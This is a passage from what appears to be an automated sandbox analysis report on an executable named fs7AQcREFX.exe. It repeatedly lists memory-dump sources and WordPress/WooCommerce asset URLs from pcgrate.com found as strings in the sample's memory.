                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/style.css?ver=3.1.7
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/toggle-switch.css?ver=3.1.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/js/add-to-cart.js?ver=3.1.7
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-pdf-catalog/public/css/woocommerce-pdf-catalog
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=5.5.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.5.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touc
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 